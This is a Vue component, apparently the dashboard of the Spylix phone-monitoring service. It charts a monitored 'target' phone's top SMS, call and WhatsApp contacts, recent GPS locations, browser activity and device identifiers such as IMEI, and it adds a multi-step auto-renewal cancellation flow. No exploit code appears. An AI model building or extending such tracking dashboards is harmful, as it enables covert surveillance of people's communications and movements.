<template>
  <div>
    <div class="Target kkkk">
      <div class="TargetsmallTitle">
        <div class="smallTitle smallTitleLeft">{{ $t("index.title") }}</div>
        <el-date-picker
          v-model="time"
          class="timeAll timeAll2"
          type="monthrange"
          @change="getlist"
          range-separator="-"
          start-placeholder=""
          end-placeholder=""
        >
        </el-date-picker>
      </div>
      <div id="charts-demo" style="width: 100%; height: 300px"></div>
    </div>
    <div style="overflow: hidden; display: flex">
      <div class="cl kkkk">
        <div class="smallTitle">{{ $t("index.tips") }}</div>

        <div class="noData" v-show="mostmsgs.msg.length <= 0 && status">
          {{ $t("index.no") }}
        </div>
        <div
          id="Messaging"
          _echarts_instance_="ec_1636560308314"
          style="
            width: 100%;
            height: 240px;
            -webkit-tap-highlight-color: transparent;
            user-select: none;
          "
        ></div>
        <div class="kkk_ul" v-show="mostmsgs.msg.length > 0">
          <div class="kkk_li" v-for="(val, key) in mostmsgs.msg" :key="key">
            <div class="kkk_img"></div>
            <div class="kkk_box">
              <div class="kk_title" v-if="val.name">
                {{ `${val.name}` }}
              </div>
              <div class="kk_ftitle">{{ val.mobile }}</div>
            </div>
          </div>
        </div>
        <router-link
          class="AllMessages"
          v-show="mostmsgs.msg.length > 0"
          :to="{ name: 'Messages' }"
        >
          {{ $t("All Messages") }}
        </router-link>
      </div>
      <div class="cl kkkk">
        <div class="smallTitle">{{ $t("Top Calling Contacts") }}</div>
        <div class="noData" v-show="mostmsgs.call_log.length <= 0 && status">
          {{ $t("index.no") }}
        </div>
        <div
          id="Calling"
          _echarts_instance_="ec_1636560308315"
          style="
            width: 100%;
            height: 240px;
            -webkit-tap-highlight-color: transparent;
            user-select: none;
          "
        ></div>
        <div class="kkk_ul" v-show="mostmsgs.call_log.length > 0">
          <div
            class="kkk_li"
            v-for="(val, key) in mostmsgs.call_log"
            :key="key"
          >
            <div class="kkk_img"></div>
            <div class="kkk_box">
              <div class="kk_title" v-if="val.name">
                {{ `${val.name}` }}
              </div>
              <div class="kk_ftitle">{{ val.mobile }}</div>
            </div>
          </div>
        </div>
        <router-link
          class="AllMessages"
          v-show="mostmsgs.call_log.length > 0"
          :to="{ name: 'Calls' }"
        >
          {{ $t("All Calls") }}
        </router-link>
      </div>
      <div class="cl kkkk">
        <div class="smallTitle">{{ $t("Top WhatsApp Contacts") }}</div>
        <div class="noData" v-show="mostmsgs.whatapp.length <= 0 && status">
          {{ $t("index.no") }}
        </div>
        <div
          id="Visited"
          _echarts_instance_="ec_1636560308316"
          style="
            width: 100%;
            height: 240px;
            -webkit-tap-highlight-color: transparent;
            user-select: none;
          "
        ></div>
        <div class="kkk_ul" v-show="mostmsgs.whatapp.length > 0">
          <div class="kkk_li" v-for="(val, key) in mostmsgs.whatapp" :key="key">
            <div class="kkk_img"></div>
            <div class="kkk_box">
              <div class="kk_title" v-if="val.name">
                {{ `${val.name}` }}
              </div>
              <div class="kk_ftitle">{{ val.mobile }}</div>
            </div>
          </div>
        </div>
        <router-link
          class="AllMessages"
          v-show="mostmsgs.whatapp.length > 0"
          :to="{ name: 'WhatsApp', params: { pkg: 1, is3: 1 } }"
        >
          {{ $t("index.all") }}
        </router-link>
      </div>
    </div>
    <div
      class="Target kkkk"
      style="padding-bottom: 30px"
      v-if="!(system == 'iOS' && systems.name == 'Basic')"
    >
      <div class="smallTitle">{{ $t("Recent Locations") }}</div>
      <div style="width: 100%; height: 360px">
        <div>
          <div class="google-map" id="map">
            <lastMap></lastMap>
          </div>
        </div>
        <div id="mapr">
          <div class="mapr_li" v-for="(val, key) in map" :key="key">
            <div></div>
            <div :title="val.address">{{ val.address }}</div>
            <div>{{ val.createtime }}</div>
          </div>
          <router-link to="GPS"> {{ $t("index.locations") }} </router-link>
          <!-- <a href="#" class="">All Messages</a> -->
        </div>
      </div>
    </div>

    <div style="overflow: hidden; display: flex; margin-bottom: 50px">
      <div class="tl kkkk">
        <div class="smallTitle">{{ $t("index.account") }}</div>
        <div class="Account">
          <div class="a_li">
            {{ $t("index.accountType") }}<span>{{ systems.name }}</span>
          </div>
          <div class="a_li">
            {{ $t("index.autoRenewal") }}
            <div
              @click="getisok()"
              :class="systems.is_auto_renewal == 1 ? 'YorN' : 'YorN no'"
            >
              <div></div>
            </div>
          </div>
          <div class="a_li">
            {{ $t("index.expiryDate") }}<span>{{ systems.vip_endtime }}</span>
          </div>
          <div
            @click="$router.push({ name: 'Billing' })"
            class="loginButton Renewal"
          >
            {{ $t("index.renewal") }}
          </div>
        </div>
      </div>
      <div class="tr kkkk">
        <div class="smallTitle">
          {{ system === "iOS" ? $t("Device & iCloud") : $t("index.about") }}
          <router-link :to="{ name: 'Device' }">
            <a class="">{{ $t("index.more") }}</a>
          </router-link>
        </div>
        <div class="system" v-if="system == 'iOS'">
          <img src="@/assets/img/i.png" />
          <div class="a_li">
            <span style="white-space: nowrap; color: #3f3f3f">{{
              $t("index.myDevice")
            }}</span
            ><span
              style="
                white-space: nowrap;
                overflow: hidden;
                text-overflow: ellipsis;
              "
              >{{ systems.device_model }}</span
            >
          </div>
          <div class="a_li">
            {{ $t("index.iosVersion")
            }}<span>{{ systems.system_version }}</span>
          </div>
        </div>
        <div class="system" v-if="system == 'iOS'">
          <img src="@/assets/img/y.png" />
          <!-- <div class="a_li">
            Operator name:<span>{{ systems.operator_name }}</span>
          </div>
          <div class="a_li">
            Internet:<span>{{ systems.internet }}</span>
          </div> -->
          <div class="a_li">
            {{ $t("index.lastBackup")
            }}<span>
              <!-- {{ systems.valid_day }} -->
            </span>
          </div>
          <div class="a_li">
            {{ $t("index.lastSync") }}<span>{{ systems.last_updated }}</span>
          </div>
        </div>
        <div class="system_Android" v-if="system == 'Android'">
          <img src="@/assets/img/a.png" />
          <div>
            <div class="a_li">
              <span>{{ $t("index.model") }}</span
              >{{ systems.device_model }}
            </div>
            <div class="a_li">
              <span>{{ $t("index.mobile") }}</span> {{ systems.operator_name }}
            </div>
            <div class="a_li">
              <span>{{ $t("index.androidVersion") }}</span
              >{{ systems.system_version }}
            </div>
            <div class="a_li">
              <span>{{ $t("index.imet") }}</span
              >{{ systems.imei }}
            </div>
            <div class="a_li">
              <span>{{ $t("index.rootStatus") }}</span
              >{{ systems.is_root }}
            </div>
            <div class="a_li">
              <span>{{ $t("index.internet") }}</span
              >{{ systems.internet }}
            </div>

            <div class="a_li">
              <span>{{ $t("index.battery") }}</span
              >{{ systems.battery }}
            </div>
            <div class="a_li">
              <span>{{ $t("index.spylixVersio") }}</span
              >{{ systems.app_version }}
            </div>
            <div class="a_li">
              <span>{{ $t("index.lastUpdated") }}</span
              >{{ systems.last_updated }}
            </div>
          </div>
        </div>
      </div>
    </div>
    <div></div>
    <div class="Popup syy" v-if="isok > 0 && isok < 7">
      <!-- @click="isok = 0" -->
      <div class="Popups_w"></div>
      <div :class="'Popups Popups' + isok">
        <img src="@/assets/img/x.png" @click="isok = 0" class="close" />
        <div v-if="isok == 1">
          <div class="Popups_title">{{ $t("index.cancel") }}</div>
          <div class="Popups_con">
            {{ $t("index.tips1") }}
          </div>
          <div @click="isok = 2" class="loginButton PopupsButton">
            {{ $t("index.leave") }}
          </div>
          <div @click="isok = 0" class="Popups_Button">
            {{ $t("index.stay") }}
          </div>
        </div>
        <!---->
        <div v-if="isok == 2">
          <div class="Popups_title">{{ $t("index.why") }}</div>
          <div class="Popups_con" style="margin-bottom: 10px">
            {{ $t("index.your") }}
          </div>
          <div class="reason" @click="editYY(1)">
            <!---->
            <img v-if="yy == 1" src="@/assets/img/qdui.png" alt="" />
            <img v-if="yy != 1" src="@/assets/img/qnodui.png" alt="" />
            {{ $t("index.problems") }}
          </div>
          <div class="reason" @click="editYY(2)">
            <!---->
            <img v-if="yy == 2" src="@/assets/img/qdui.png" alt="" />
            <img v-if="yy != 2" src="@/assets/img/qnodui.png" alt="" />
            {{ $t("index.anymore") }}
          </div>
          <div class="reason" @click="editYY(3)">
            <!---->
            <img v-if="yy == 3" src="@/assets/img/qdui.png" alt="" />
            <img v-if="yy != 3" src="@/assets/img/qnodui.png" alt="" />
            {{ $t("index.program") }}
          </div>
          <div class="reason" @click="editYY(4)">
            <!---->
            <img v-if="yy == 4" src="@/assets/img/qdui.png" alt="" />
            <img v-if="yy != 4" src="@/assets/img/qnodui.png" alt="" />
            {{ $t("index.expensive") }}
          </div>
          <div class="reason" @click="editYY(5)">
            <!---->
            <img v-if="yy == 5" src="@/assets/img/qdui.png" alt="" />
            <img v-if="yy != 5" src="@/assets/img/qnodui.png" alt="" />
            {{ $t("index.alternative") }}
          </div>
          <div class="reason" @click="editYY(6)">
            <!---->
            <img v-if="yy == 6" src="@/assets/img/qdui.png" alt="" />
            <img v-if="yy != 6" src="@/assets/img/qnodui.png" alt="" />
            {{ $t("index.other") }}
          </div>
          <input
            v-if="yy != 6"
            disabled="disabled"
            type="text"
            :placeholder="$t('Comments')"
            class="other"
          />
          <input
            v-if="yy == 6"
            v-model="inputs"
            type="text"
            :placeholder="$t('Comments')"
            class="other"
          />
          <!---->
          <div
            :class="
              yy > 0
                ? 'loginButton PopupsButton'
                : 'loginButton PopupsButton ssr'
            "
            @click="yy > 0 ? (isok = 3) : ''"
          >
            {{ $t("index.continue") }}
          </div>
          <!---->
          <div class="Popups_Button" @click="isok = 1">
            {{ $t("index.back") }}
          </div>
        </div>
        <!---->
        <div v-if="isok == 3">
          <div class="Popups_title">
            {{ $t("index.our") }}
          </div>
          <div class="Popups_con">
            {{ $t("index.viaEmail") }}
            <!-- ( -->
            <a href="mailto:support@spylix.com">support@spylix.com</a>.
            <!-- ),<a>+1(855)896-0187</a> , or in a live chat -->
            <!-- on <a>spylix</a>website -->
          </div>
          <div @click="isok = 4" class="loginButton PopupsButton">
            {{ $t("index.continue") }}
          </div>
          <div @click="isok = 2" class="Popups_Button helveticaBold">
            {{ $t("index.back") }}
          </div>
        </div>
        <!---->
        <div v-if="isok == 4">
          <div class="Popups_title">
            {{ $t("index.below") }}
          </div>
          <input
            v-model="Email"
            type="text"
            :placeholder="$t('Email*')"
            class="other"
            style="margin-bottom: 10px"
          />
          <div class="Popups_con">
            {{ $t("index.arrive") }}
          </div>
          <div
            @click="Email != '' ? getsend() : ''"
            :class="
              Email != ''
                ? 'loginButton PopupsButton'
                : 'loginButton PopupsButton ssr'
            "
          >
            {{ $t("index.continue") }}
          </div>
          <!---->
          <div @click="isok = 3" class="Popups_Button helveticaBold">
            {{ $t("index.back") }}
          </div>
        </div>
        <!---->
        <div v-if="isok == 5">
          <div class="Popups_title">
            {{ $t("index.received") }}
          </div>
          <input
            v-model="Comments"
            type="text"
            :placeholder="$t('Code*')"
            class="other"
            style=""
          />
          <div
            @click="noRenewal"
            :class="
              Comments != ''
                ? 'loginButton PopupsButton'
                : 'loginButton PopupsButton ssr'
            "
          >
            {{ $t("index.submit") }}
          </div>
          <!---->
          <div @click="isok = 4" class="Popups_Button helveticaBold">
            {{ $t("index.neverMind") }}
          </div>
        </div>

        <!---->
        <div v-if="isok == 6">
          <div class="Popups_title">{{ $t("index.cancelled") }}</div>
          <div class="Popups_con">
            {{ $t("index.have") }}
          </div>
          <div @click="cancel()" class="loginButton okButton">
            {{ $t("index.ok") }}
          </div>
        </div>
      </div>
    </div>
  </div>
</template>

<script>
import {
  indexAccountInfo,
  mostmsg,
  getTargetActivity,
  lastgps,
  apiEmssend,
  vipChangeAuto,
  RenewalAdd,
  EmsCheck,
  getEquipmentList,
} from "@/api/user";
import lastMap from "./lastMap";
import languageTranslation from "./languageTranslation";
// eslint-disable-next-line no-unused-vars
const TILE_SIZE = 256;
export default {
  name: "HelloWorld",
  components: {
    lastMap,
    languageTranslation,
  },
  data() {
    let end = new Date();
    let start = new Date(new Date().setDate(end.getDate() - 90));
    return {
      dataList: [],
      infowindows: [],
      mapDiv: null,
      isok: 0,
      lat: 40.772072448457735,
      lng: -73.99482299312687,
      time: [start, end],
      yy: 0,
      Comments: "",
      Email: "",
      inputs: "",
      systems: {
        vip_endtime: "",
        name: "",
        is_auto_renewal: 0,
        device_model: "",
        internet: "",
        Android_version: "",
        spy_version: "",
        battery: "",
      },
      map: [],
      mostmsgs: {
        call_log: [],
        msg: [],
        whatapp: [],
      },
      system: localStorage.getItem("system"),
      msg: "",
      status: false,
    };
  },
  mounted() {
    this.getgetEquipmentList();
    this.getindex();
    this.getlist();
  },
  methods: {
    async getgetEquipmentList() {
      if (localStorage.getItem("token")) {
        let adj = await getEquipmentList();
        if (adj.data && adj.data.length > 0) {
          if (localStorage.getItem("systemName")) {
          } else {
            localStorage.setItem("systemName", adj.data[0].name);
          }

          // 过期逻辑判断处理
          // if(adj.data[0].isvipend == 2){
          //      this.$router.push({ name: 'Billing' });
          // }
        }
      } else {
        this.$router.push({ name: "login" });
      }
    },
    doEmsCheck() {
      EmsCheck({
        email: this.Email,
        event: "cancel_auto",
        captcha: this.Comments,
      }).then((res) => {
        if (res.code !== 1) {
          this.$message.error(res.msg);
          return;
        }
        this.isok = 6;
      });
    },
    editYY(yy) {
      this.yy = this.yy === yy ? 0 : yy;
    },
    cancel() {
      this.isok = 0;
    },
    noRenewal() {
      let reasons = [
        "",
        this.$t("index.problems"),
        this.$t("index.anymore"),
        this.$t("index.program"),
        this.$t("index.expensive"),
        this.$t("index.alternative"),
        this.inputs,
      ];
      let reason = reasons[this.yy];
      let key = {
        equipment_id: localStorage.getItem("systemId"),
        reason: reason,
        email: this.Email,
        code: this.Comments,
      };
      RenewalAdd(key).then((adj) => {
        if (parseInt(adj.code) === 1) {
          this.isok = 6;
          this.systems.is_auto_renewal = 0;
          // vipChangeAuto({
          //   equipment_id: localStorage.getItem('systemId'),
          //   state: 1
          // }).then((adj1) => {
          //   if (adj1.code !== 1) {
          //     this.$message.error(adj.msg)
          //   }
          // })
        } else {
          this.Comments = null;
          this.$message.error(adj.msg);
        }
      });
    },
    getsend() {
      let logins = {
        email: this.Email,
        event: "cancel_auto",
      };
      apiEmssend(logins).then((adj) => {
        if (parseInt(adj.code) === 1) {
          this.isok = 5;
        } else {
          this.$message.error(adj.msg);
        }
      });
    },
    getisok() {
      if (parseInt(this.systems.is_auto_renewal) !== 1) {
        this.isok = 0;
        vipChangeAuto({
          equipment_id: localStorage.getItem("systemId"),
          state: 1,
        }).then((adj) => {
          this.systems.is_auto_renewal = 1;
        });
      } else {
        this.isok = 1;
      }
    },
    getindex() {
      indexAccountInfo({ equipment_id: localStorage.getItem("systemId") }).then(
        (adj) => {
          this.systems = adj.data.vipinfo;
        }
      );
      lastgps({ equipment_id: localStorage.getItem("systemId") }).then(
        (asd) => {
          this.map = asd.data || [];
          if (this.map.length > 0) {
            this.lat = Number(asd.data[0].latitude);
            this.lng = Number(asd.data[0].longitude);
          }
          // this.initMap()
        }
      );
      this.status = false;
      mostmsg({ equipment_id: localStorage.getItem("systemId") }).then(
        (qwe) => {
          this.mostmsgs = qwe.data;
          this.getChart1(qwe.data.msg);
          this.getChart2(qwe.data.call_log);
          this.getChart3(qwe.data.whatapp);
          this.status = true;
        }
      );
    },
    // initMap () {
    //   // eslint-disable-next-line no-undef
    //   const mapDiv = new google.maps.Map(document.getElementById('map'), {
    //     center: {
    //       lat: this.lat,
    //       lng: this.lng
    //     },
    //     zoom: 15,
    //     maxZoom: 20,
    //     minZoom: 3,
    //     streetViewControl: false,
    //     mapTypeControl: false,
    //     disableDefaultUI: false,
    //     zoomControl: false,
    //     scaleControl: false
    //   })
    //   this.mapDiv = mapDiv
    //   this.handLigature()
    // },
    handLigature() {
      var polyOptions = {
        strokeColor: "#008000", // 颜色
        strokeOpacity: 2.0, // 透明度
        strokeWeight: 4, // 宽度
      };
      // eslint-disable-next-line no-undef
      const poly = new google.maps.Polyline(polyOptions);
      poly.setMap(this.mapDiv);
      this.map.forEach((el, index) => {
        var path = poly.getPath();
        // eslint-disable-next-line no-undef
        path.push(
          // eslint-disable-next-line no-undef
          new google.maps.LatLng(Number(el.latitude), Number(el.longitude))
        );
        this.setMarker(Number(el.latitude), Number(el.longitude), el);
      });
    },
    setMarker(lat, lng, el) {
      lat = lat || this.lat;
      lng = lng || this.lng;
      // eslint-disable-next-line no-undef
      const marker = new google.maps.Marker({
        position: {
          lat,
          lng,
        },
        icon: {
          url: "https://api.spylix.com/img/location.png",
          // eslint-disable-next-line no-undef
          scaledSize: new google.maps.Size(50, 50),
        },
        map: this.mapDiv,
      });
      // eslint-disable-next-line no-undef
      const latLng = new google.maps.LatLng(lat, lng);
      // eslint-disable-next-line no-undef
      var infowindow = new google.maps.InfoWindow({
        content: `<div style="padding: 10px; max-width: 220px">
          <div style="line-height: 23px; font-size: 0.75rem;">
            <span>Latitude</span>
            <span style="padding-left: 5px"> ${latLng.lat().toFixed(7)} </span>
          </div>
          <div style="line-height: 23px; font-size: 0.75rem;">
            <span>Longitude</span>
            <span style="padding-left: 5px"> ${latLng.lng().toFixed(7)} </span>
          </div>
          <div style="line-height: 23px; font-size: 0.75rem;">
            <span>Date</span>
            <span style="padding-left: 5px">2021-10-12 00:31:30</span>
          </div>
          <div style="line-height: 23px; font-size: 0.75rem;">
            <span>Accuracy</span>
            <span style="padding-left: 5px"> ${el.accuracy || ""} </span>
          </div>
          <div style="line-height: 23px; font-size: 0.75rem;">
            <span>Address</span>
            <span style="padding-left: 5px"> ${el.address} </span>
          </div>
        </div>`,
      });

      this.infowindows.push({
        id: el.id,
        infowindow: infowindow,
      });
      // eslint-disable-next-line no-undef
      google.maps.event.addListener(marker, "click", () => {
        this.infowindows.forEach((el) => {
          el.infowindow.close();
        });
        infowindow.open(this.mapDiv, marker);
      });
    },
    getChart(browser, gps, message, whatsapp, date) {
      let myChart = this.$echarts.init(document.getElementById("charts-demo"));

      let text = {
        left: "3%",
        align: "left",
      };
      if (this.$i18n.locale == "ar") {
        text = {
          right: "3%",
          align: "right",
        };
      }
      myChart.setOption({
        grid: {
          left: "3%",
          right: "4%",
          bottom: "3%",
          top: "15%",
          containLabel: true,
        },
        legend: {
          data: [
            this.$t("header.text"),
            this.$t("header.gps"),
            this.$t("header.whatsApp"),
            this.$t("Browser History"),
          ],
          ...text,
          // itemWidth: '20',
          // itemHeight: '8',
          // height: '8px',
          // width: '20px'
        },
        xAxis: {
          type: "category",
          data: date,
        },
        yAxis: {
          type: "value",
        },
        // normal: {
        //   barBorderRadius: [100, 100, 0, 0]
        // },
        series: [
          {
            name: this.$t("header.text"),
            data: message,
            barWidth: "10",
            itemStyle: {
              barBorderRadius: [100, 100, 0, 0],
              color: "#6e53ed",
            },
            type: "bar",
          },
          {
            name: this.$t("header.gps"),
            data: gps,
            barWidth: "10",
            itemStyle: {
              barBorderRadius: [100, 100, 0, 0],
              color: "#5dc8da",
            },
            type: "bar",
          },
          {
            name: this.$t("header.whatsApp"),
            data: whatsapp,
            barWidth: "10",
            itemStyle: {
              barBorderRadius: [100, 100, 0, 0],
              color: "#55ba79",
            },
            type: "bar",
          },
          {
            name: this.$t("Browser History"),
            data: browser,
            barWidth: "10",
            barGap: "100%",
            itemStyle: {
              barBorderRadius: [100, 100, 0, 0],
              width: "20",
              color: "#4995ef",
            },
            type: "bar",
          },
        ],
      });
    },
    getChart1(adj) {
      let myChart1 = this.$echarts.init(document.getElementById("Messaging"));
      var datas = [];
      for (var a = 0; a < adj.length; a++) {
        datas[datas.length] = {
          value: adj[a].count,
          // name: adj[a].name + '(' + adj[a].count + ')',
          name: `${
            adj[a].name !== "" && adj[a].name !== null
              ? adj[a].name
              : adj[a].mobile
          }\r\n(${adj[a].count} ${this.$t("times")})`,
          itemStyle: {
            color:
              a === 0
                ? "#4995ef"
                : a === 1
                ? "#5dc8da"
                : a === 2
                ? "#6e53ed"
                : a === 3
                ? "#55ba79"
                : "",
          },
        };
      }
      myChart1.setOption({
        series: [
          {
            type: "pie",
            radius: ["60%", "70%"],
            data: datas,
          },
        ],
      });
    },
    getChart2(adj) {
      let myChart2 = this.$echarts.init(document.getElementById("Calling"));
      var datas = [];
      for (var a = 0; a < adj.length; a++) {
        datas[datas.length] = {
          value: adj[a].count,
          // name: adj[a].name + '(' + adj[a].count + ')',
          name: `${
            adj[a].name !== "" && adj[a].name !== null
              ? adj[a].name
              : adj[a].mobile
          }\r\n(${adj[a].count} ${this.$t("times")})`,
          itemStyle: {
            color:
              a === 0
                ? "#4995ef"
                : a === 1
                ? "#5dc8da"
                : a === 2
                ? "#6e53ed"
                : a === 3
                ? "#55ba79"
                : "",
          },
        };
      }
      myChart2.setOption({
        series: [
          {
            type: "pie",
            radius: ["60%", "70%"],
            data: datas,
          },
        ],
      });
    },
    getChart3(whatapp) {
      let myChart3 = this.$echarts.init(document.getElementById("Visited"));
      var datas = [];
      for (var a = 0; a < whatapp.length; a++) {
        datas[datas.length] = {
          value: whatapp[a].count,
          name: `${
            whatapp[a].name !== "" && whatapp[a].name !== null
              ? whatapp[a].name
              : whatapp[a].mobile
          }\r\n(${whatapp[a].count} ${this.$t("times")})`,
          itemStyle: {
            color:
              a === 0
                ? "#4995ef"
                : a === 1
                ? "#5dc8da"
                : a === 2
                ? "#6e53ed"
                : a === 3
                ? "#55ba79"
                : "",
          },
        };
      }
      myChart3.setOption({
        series: [
          {
            type: "pie",
            radius: ["60%", "70%"],
            data: datas,
          },
        ],
      });
    },
    getlist() {
      var key = {
        equipment_id: localStorage.getItem("systemId"),
        date: "",
        starttime: "",
        endtime: "",
      };
      key.starttime =
        this.time[0].getFullYear() +
        "-" +
        (this.time[0].getMonth() < 9 ? "0" : "") +
        (this.time[0].getMonth() + 1);
      key.date =
        this.time[0].getFullYear() +
        "-" +
        (this.time[0].getMonth() < 9 ? "0" : "") +
        (this.time[0].getMonth() + 1);
      key.endtime =
        this.time[1].getFullYear() +
        "-" +
        (this.time[1].getMonth() < 9 ? "0" : "") +
        (this.time[1].getMonth() + 1);
      getTargetActivity(key).then((qwe) => {
        var browser = [];
        var gps = [];
        var message = [];
        var whatsapp = [];
        qwe.data.date.forEach((item, index) => {
          let bro = qwe.data.browser.find((d) => d.month === item) || {
            count: 0,
          };
          let gp = qwe.data.gps.find((d) => d.month === item) || { count: 0 };
          let msg = qwe.data.message.find((d) => d.month === item) || {
            count: 0,
          };
          let whapp = qwe.data.whatsapp.find((d) => d.month === item) || {
            count: 0,
          };
          browser.push(bro.count);
          gps.push(gp.count);
          message.push(msg.count);
          whatsapp.push(whapp.count);
          // if (item) {
          //   browser.push(qwe.data.browser[qw].count)
          //   gps.push(qwe.data.gps[qw].count)
          //   message.push(qwe.data.message[qw].count)
          //   whatsapp.push(qwe.data.whatsapp[qw].count)
          // }
        });
        // for (var qw = 0; qw < qwe.data.browser.length; qw++) {
        //   browser.push(qwe.data.browser[qw].count)
        //   gps.push(qwe.data.gps[qw].count)
        //   message.push(qwe.data.message[qw].count)
        //   whatsapp.push(qwe.data.whatsapp[qw].count)
        // }
        this.getChart(browser, gps, message, whatsapp, qwe.data.date);
      });
    },
  },
};
</script>

<!-- Add "scoped" attribute to limit CSS to this component only -->
<style scoped>
.kkkk {
  background: #fff;
  box-shadow: 0 4px 12px -4px rgba(122, 138, 153, 0.2);
  border-radius: 12px;
  margin-top: 20px;
}

.tl {
  margin: 20px 0 0 1.5%;
  width: 38%;
  float: left;
  min-height: 240px;
}

.Account {
  width: 100%;
  border-top: 1px solid #e1e3e6;
}

.a_li {
  display: flex;
  justify-content: space-between;
  font-size: 14px;
  color: #3f3f3f;
  margin-top: 10px;
  line-height: 20px;
  text-indent: 20px;
  overflow: hidden;
}

.a_li span {
  /* float: right; */
  text-align: right;
  color: #9f9f9f;
  margin-right: 20px;
  font-weight: 400;

}

.YorN {
  float: right;
  margin-right: 20px;
  width: 44px;
  height: 22px;
  background: #00eec3;
  border-radius: 11px;
  overflow: hidden;
  cursor: pointer;
}

.YorN div {
  width: 18px;
  height: 18px;
  border-radius: 9px;
  float: left;
  background: #fff;
  margin: 2px 2px 2px 24px;
}

.YorN.no {
  background: #999;
}

.YorN.no div {
  margin-left: 2px;
}

.Renewal {
  width: 188px;
  height: 36px;
  line-height: 36px;
  margin-top: 25px;
  font-size: 15px;
  margin-bottom: 0;
}

.tr {
  margin: 20px 0 0 1.5%;
  width: 57%;
  float: left;
  min-height: 240px;
  overflow: hidden;
}

.system {
  width: 47%;
  margin-left: 2%;
  float: left;
  border: 1px solid #e1e3e6;
  border-radius: 12px;
  height: 165px;
}

.system img {
  display: block;
  width: 40px;
  height: 40px;
  margin: 20px auto 0;
}

.system .a_li {
  font-size: 13px;
}

.system_Android {
  width: 96%;
  margin-left: 2%;
  border: 1px solid #e1e3e6;
  border-radius: 12px;
  min-height: 145px;
  padding: 10px 0;
  overflow: hidden;
  margin-bottom: 20px;
  display: flex;
}

.system_Android img {
  float: left;
  width: 42px;
  height: 42px;
  margin: 50px 20px 50px 30px;
}

@media screen and (max-width: 1542px) {
  .system_Android img {
    margin: 50px 20px 105px 30px;
  }
}

@media screen and (max-width: 1240px) {
  .tr {
    min-height: 240px;
  }

  .tl {
    min-height: 240px;
  }
}

.system_Android div.a_li {
  float: left;
  min-width: 300px;
  width: 40%;
  /* height: 20px;
  line-height: 20px; */
  margin-top: 20px;
  font-size: 13px;
  color: #9f9f9f;
  text-indent: 0;
}

.system_Android div.a_li span {
  float: left;
  display: block;
  width: 140px;
  width: auto;
  text-align: left;
  font-size: 13px;
  color: #3f3f3f;
  padding-left: 20px;
}

.Target {
  width: 97%;
  margin: 20px 1.5% 0;
}

.cl {
  float: left;
  width: 31.33%;
  margin-left: 1.5%;
}

.kkk_ul {
  width: 90%;
  margin: 0 auto;
  overflow: hidden;
  background: #f6f8fa;
  border-radius: 12px;
  padding: 5px 0 20px;
  display: flex;
  flex-wrap: wrap;
}

.kkk_ul .kkk_li {
  width: calc(100% / 2 - (10px * 2));
  display: flex;
  align-items: center;
  margin: 10px;
  /* float: left;
  width: 50%;
  height: 40px;
  line-height: 20px;
  margin-top: 15px; */
}

.kkk_img {
  width: 12px;
  height: 12px;
  background: #4995ef;
  border-radius: 50%;
  margin-right: 10px;
}

.kkk_box {
  width: calc(100% - 22px);
}

.kkk_ul .kkk_li:first-child .kkk_img {
  background: #4995ef;
}

.kkk_ul .kkk_li:first-child + .kkk_li .kkk_img {
  background: rgb(93, 200, 218);
}

.kkk_ul .kkk_li:first-child + .kkk_li + .kkk_li .kkk_img {
  background: rgb(110, 83, 237);
}

.kkk_ul .kkk_li:first-child + .kkk_li + .kkk_li + .kkk_li .kkk_img {
  background: rgb(85, 186, 121);
}

.kk_title {
  font-size: 13px;
  color: #000927;
  word-break: keep-all;
  /* 不换行 */
  white-space: nowrap;
  /* 不换行 */
  overflow: hidden;
  text-overflow: ellipsis;
}

.kk_ftitle {
  font-size: 12px;
  color: #b4b5b8;
  word-break: keep-all;
  /* 不换行 */
  white-space: nowrap;
  /* 不换行 */
  overflow: hidden;
  text-overflow: ellipsis;
}

.AllMessages {
  height: 54px;
  display: block;
  width: 100%;
  line-height: 54px;
  font-size: 14px;
  color: #0080ff;
  text-align: center;
  font-weight: 400;
}

#map {
  width: 58.5%;
  margin-left: 1.5%;
  height: 360px;
  background-color: #999;
  border-radius: 12px;
  float: left;
}

#mapr {
  float: left;
  width: 36%;
  margin-left: 2%;
  font-size: 14px;
  height: 100%;
}

.mapr_li {
  overflow: hidden;
  width: 100%;
  margin-bottom: 15px;
}

.mapr_li div:first-child {
  float: left;
  width: 8px;
  height: 8px;
  border-radius: 50%;
  background: #0cd4b0;
  margin: 6px 8px 20px 0;
}

.mapr_li div:first-child + div {
  font-size: 13px;
  line-height: 20px;
  overflow: hidden;
  text-overflow: ellipsis;
  display: -webkit-box;
  -webkit-box-orient: vertical;
  -webkit-line-clamp: 2;
}

.mapr_li div:first-child + div + div {
  font-size: 12px;
  color: #b4b5b8;
}

#mapr a {
  font-size: 14px;
  color: #0080ff;
  text-align: center;
  font-weight: 400;
}

.timeAll {
  float: right;
  margin-top: 10px;
  margin-right: 40px;
  width: 200px;
}

.smallTitleLeft {
  float: left;
  font-family: Noto Sans !important;
}

.TargetsmallTitle {
  overflow: hidden;
}

.Popups_title {
  margin-top: 30px;
  margin-bottom: 20px;
  font-family: Noto Sans;
  font-size: 16px;
  color: #000927;
}

.Popups {
  padding: 0 50px;
}

.Popups1 {
  width: 400px;
  height: 260px;
  margin: -130px -250px;
}

.Popups2 {
  width: 400px;
  height: 480px;
  margin: -240px -250px;
}

.Popups3 {
  width: 400px;
  height: 270px;
  margin: -135px -250px;
}

.Popups4 {
  width: 400px;
  height: 330px;
  margin: -165px -250px;
}

.Popups5,
.Popups6 {
  width: 400px;
  height: 260px;
  margin: -130px -250px;
}

.Popups_title {
  font-size: 16px;
  color: #000927;
  font-weight: 400;
}

.Popups_con {
  font-size: 14px;
  color: grey;
  margin-bottom: 40px;
  font-family: Noto Sans;
}

.Popups_con a {
  color: #0080ff;
}

.PopupsButton {
  width: 180px;
  height: 40px;
  float: left;
  line-height: 40px;
  font-size: 15px;
}

.Popups_Button {
  cursor: pointer;
  width: 176px;
  height: 36px;
  line-height: 36px;
  text-align: center;
  font-size: 15px;
  color: #000927;
  float: left;
  border: 2px solid #00eec3;
  border-radius: 22px;
  margin-left: 40px;
  font-family: Noto Sans;
}

.reason {
  overflow: hidden;
  line-height: 34px;
  height: 34px;
  font-size: 13px;
  color: #45484d;
  cursor: pointer;
  font-family: Noto Sans;
}

.reason img {
  float: left;
  margin: 7px 10px 0 0;
  width: 20px;
  height: 20px;
}

input.other {
  width: 398px;
  height: 38px;
  line-height: 38px;
  border: 1px solid #d5d7db;
  border-radius: 8px;
  background: #f6f8fa;
  font-size: 13px;
  text-indent: 10px;
  margin-bottom: 40px;
  font-family: Noto Sans;
}
</style>



// WEBPACK FOOTER //
// src/components/index.vue